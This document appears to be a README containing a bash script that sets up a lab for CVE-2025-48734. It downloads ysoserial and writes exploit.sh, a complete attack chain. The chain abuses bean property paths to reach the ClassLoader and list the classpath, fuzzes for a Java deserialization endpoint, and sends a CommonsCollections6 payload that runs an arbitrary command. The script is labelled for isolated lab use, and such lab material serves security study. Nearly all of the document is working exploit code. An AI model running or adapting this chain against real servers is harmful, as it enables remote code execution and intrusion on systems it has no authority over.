README.md
Rendering markdown...
#!/usr/bin/env bash
set -euo pipefail
# ============================================
# CVE-2025-48734 Lab - Kali Attack Tools
# Use ONLY in an isolated lab environment
# ============================================
TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$HOME/lab-tools"
YSOSERIAL_URL="https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar"
pretty() { python3 -m json.tool 2>/dev/null || cat; }
mkdir -p "$TOOLS_DIR"
cd "$TOOLS_DIR"
# ---------- Dependencies ----------
echo "[*] Checking dependencies..."
apt-get update -q
apt-get install -y --no-install-recommends curl python3 default-jdk
# ---------- Download ysoserial ----------
if [ ! -f ysoserial-all.jar ]; then
echo "[*] Downloading ysoserial..."
curl -sL "$YSOSERIAL_URL" -o ysoserial-all.jar
else
echo "[*] ysoserial already downloaded"
fi
# ---------- Chained attack script ----------
cat > exploit.sh << 'EXPLOITEOF'
#!/usr/bin/env bash
TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$(dirname "$0")"
pretty() { python3 -m json.tool 2>/dev/null || cat; }
echo ""
echo "============================================="
echo " PHASE 1 - Initial Reconnaissance"
echo "============================================="
echo "[*] Probing simple bean properties..."
curl -s "$BASE_URL/api/property?path=id" | pretty
echo ""
curl -s "$BASE_URL/api/property?path=status" | pretty
echo ""
echo "[*] Attempting access to declaringClass (CVE-2025-48734)..."
RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass")
echo "$RESULT" | pretty
echo ""
STATUS=$(echo "$RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
if [ "$STATUS" != "success" ]; then
echo "[-] declaringClass blocked - application is PATCHED. Aborting."
exit 1
fi
echo "[+] CVE-2025-48734 CONFIRMED - declaringClass accessible"
echo ""
echo "[*] Escalating to ClassLoader..."
CL_RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader")
echo "$CL_RESULT" | pretty
echo ""
CL_TYPE=$(echo "$CL_RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('valueClass',''))" 2>/dev/null)
echo "[+] ClassLoader obtained: $CL_TYPE"
echo ""
echo "============================================="
echo " PHASE 2 - Classpath Enumeration via CVE"
echo "============================================="
echo "[*] Iterating ClassLoader URLs via BeanUtils index notation..."
CC="NOT FOUND"
IDX=0
CLASSPATH_ENTRIES=()
while true; do
ENTRY=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader.URLs%5B${IDX}%5D")
ESTATUS=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
if [ "$ESTATUS" != "success" ]; then
break
fi
VAL=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('value',''))" 2>/dev/null)
CLASSPATH_ENTRIES+=("$VAL")
echo " [$IDX] $VAL"
if echo "$VAL" | grep -q "commons-collections-3"; then
CC="FOUND"
fi
IDX=$((IDX + 1))
done
echo ""
if [ "$CC" = "NOT FOUND" ]; then
echo "[-] Commons Collections 3.x not found in classpath."
echo "[-] No gadget chain available. Aborting."
exit 1
fi
echo "[+] Commons Collections 3.x found - gadget chain available"
echo ""
echo "============================================="
echo " PHASE 3 - Deserialization Endpoint Discovery"
echo "============================================="
echo "[*] Fuzzing common import/sync endpoints..."
DESER_ENDPOINT=""
for path in "/api/data/import" "/api/import" "/api/sync" "/api/upload" "/api/data/sync"; do
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$BASE_URL$path" \
-H "Content-Type: application/octet-stream" \
--data-binary $'\xac\xed\x00\x05')
echo " POST $path → HTTP $CODE"
if [ "$CODE" = "200" ] || [ "$CODE" = "400" ]; then
# Verify ObjectInputStream by checking for EOFException signature
RESP=$(curl -s -X POST "$BASE_URL$path" \
-H "Content-Type: application/octet-stream" \
--data-binary $'\xac\xed\x00\x05')
if echo "$RESP" | grep -q "EOFException\|success\|error"; then
DESER_ENDPOINT="$path"
echo "[+] Deserialization endpoint found: $path"
break
fi
fi
done
echo ""
if [ -z "$DESER_ENDPOINT" ]; then
echo "[-] No deserialization endpoint found. Aborting."
exit 1
fi
echo "============================================="
echo " PHASE 4 - Payload Generation and Delivery"
echo "============================================="
if [ $# -lt 3 ]; then
echo "[!] Usage: $0 <target> <port> <command>"
echo "[!] Example: $0 10.211.55.10 8080 'id'"
exit 1
fi
CMD="$3"
PAYLOAD_FILE="$TOOLS_DIR/payload.ser"
echo "[*] Generating ysoserial payload..."
echo " Chain: CommonsCollections6"
echo " Command: $CMD"
echo ""
java \
--add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
--add-opens java.base/java.text=ALL-UNNAMED \
--add-opens java.desktop/java.awt.font=ALL-UNNAMED \
-jar "$TOOLS_DIR/ysoserial-all.jar" CommonsCollections6 "$CMD" > "$PAYLOAD_FILE" 2>/dev/null
echo "[*] Payload generated: $PAYLOAD_FILE ($(wc -c < "$PAYLOAD_FILE") bytes)"
echo "[*] Sending to endpoint $DESER_ENDPOINT..."
echo ""
curl -s -X POST "$BASE_URL$DESER_ENDPOINT" \
-H "Content-Type: application/octet-stream" \
--data-binary "@$PAYLOAD_FILE" | pretty
echo ""
echo "============================================="
echo " SUMMARY"
echo "============================================="
echo " CVE-2025-48734: EXPLOITED"
echo " Classpath via CVE: Commons Collections 3.x found"
echo " Deser endpoint: $BASE_URL$DESER_ENDPOINT"
echo " Payload: CommonsCollections6"
echo " Command executed: $CMD"
echo "============================================="
EXPLOITEOF
chmod +x exploit.sh
echo ""
echo "============================================="
echo " Tools ready in: $TOOLS_DIR"
echo "============================================="
echo " Usage:"
echo " ./exploit.sh $TARGET $PORT 'id'"
echo " ./exploit.sh $TARGET $PORT 'bash -c {id,}>/tmp/out.txt'"
echo "============================================="